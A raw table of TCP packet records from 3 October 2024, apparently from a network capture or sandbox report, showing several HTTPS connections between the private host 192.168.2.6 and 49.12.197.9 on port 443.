                                                                                                                                                      Oct 3, 2024 09:16:14.319170952 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.020281076 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.020361900 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.020392895 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.020421028 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.020610094 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.020627975 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.132426977 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.132483959 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.132566929 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.132968903 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.132985115 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.777064085 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.778101921 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.779067993 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.779082060 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.780994892 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.781002998 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.781056881 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.781065941 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.124891043 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.124946117 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.125020981 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.125560045 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.125576019 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.559340000 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.559415102 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.559441090 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.559459925 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.559504986 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.560162067 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.570682049 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.570714951 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.769330025 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.769527912 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.790394068 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.790424109 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.806427002 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.806451082 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.188451052 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.188476086 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.188494921 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.188518047 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.188555956 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.188575983 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.188633919 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.218642950 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.218672037 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.218978882 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.219027042 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.219075918 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.286676884 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.286703110 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.287076950 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.287116051 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.287168026 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.313077927 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.313107014 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.313347101 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.313386917 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.313437939 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.353009939 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.353039026 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.353230953 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.353280067 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.353328943 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.381232977 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.381266117 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.381405115 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.381465912 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.381516933 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.401777029 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.401802063 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.401936054 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.401968956 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.402019024 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.415743113 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.415771008 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.415968895 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.415997028 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.416049957 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.432854891 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.432890892 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.433054924 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.433104992 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.433161020 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.449660063 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.449688911 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.449799061 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.449831963 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.449876070 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.463627100 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.463655949 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.463747978 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.463778019 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.463826895 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.479350090 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.479377031 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.479578018 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.479614973 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.479665995 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.494168997 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.494194031 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.494354010 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.494385958 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.494432926 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.503803015 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.503839016 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.503983021 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.504010916 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.504057884 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.513818026 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.513842106 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.513919115 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.513946056 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.513995886 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.521801949 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.521828890 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.521927118 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.521945953 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.522000074 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.539578915 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.539607048 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.539803982 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.539832115 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.539990902 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.541609049 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.541635990 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.541701078 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.541711092 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.541754961 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.550309896 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.550338030 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.550487041 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.550499916 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.550542116 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.564076900 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.564105034 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.564519882 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.564534903 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.564590931 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.576442957 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.576468945 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.576647997 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.576690912 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.576752901 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.588829994 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.588859081 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.589025021 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.589056015 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.589104891 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.598300934 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.598335028 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.598500967 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.598532915 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.598583937 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.607744932 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.607769966 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.607881069 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.607916117 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.607961893 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.616441965 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.616468906 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.616614103 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.616637945 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.616686106 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.623424053 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.623451948 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.623557091 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.623589993 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.623647928 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.632600069 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.632621050 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.632750034 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.632786989 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.632836103 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.651068926 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.651098013 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.651281118 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.651308060 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.651355982 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.663894892 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.663913965 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.664113998 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.664200068 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.664251089 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.675539017 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.675565004 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.675785065 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.675849915 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.675914049 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.684720993 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.684746027 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.684931993 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.684995890 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.685048103 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.694336891 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.694355011 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.695127010 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.695192099 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.695244074 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.703329086 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.703352928 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.703459024 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.703491926 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.703542948 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.710103989 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.710120916 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.710241079 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.710294008 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.710341930 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.719600916 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.719624043 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.719738007 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.719768047 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.719815969 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.738203049 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.738220930 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.738303900 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.738357067 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.738523006 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.751135111 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.751166105 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.751250029 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.751290083 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.751338005 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.762677908 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.762711048 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.762756109 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.762783051 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.762799978 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.762835979 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.771841049 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.771861076 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.771902084 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.771919966 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.771935940 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.771958113 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.781610966 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.781634092 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.781689882 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.781714916 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.781758070 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.781807899 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.790153980 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.790182114 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.790237904 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.790267944 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.790287018 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.790311098 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.797591925 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.797620058 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.797665119 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.797689915 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.797708988 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.797734022 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.807408094 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.807425976 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.807490110 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.807513952 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.807565928 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.824943066 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.824973106 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.825059891 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.825092077 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.825140953 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.838105917 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.838133097 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.838274002 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.838308096 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.838357925 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.849626064 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.849648952 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.849809885 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.849843979 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.849893093 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.861814976 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.861840010 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.861963034 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.861984015 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.862030983 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.872971058 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.873003960 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.873162031 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.873193026 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.873246908 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.877100945 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.877118111 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.877206087 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.877233982 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.877280951 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.884732962 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.884749889 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.884840012 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.884865046 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.885001898 CEST49727443192.168.2.649.12.197.9
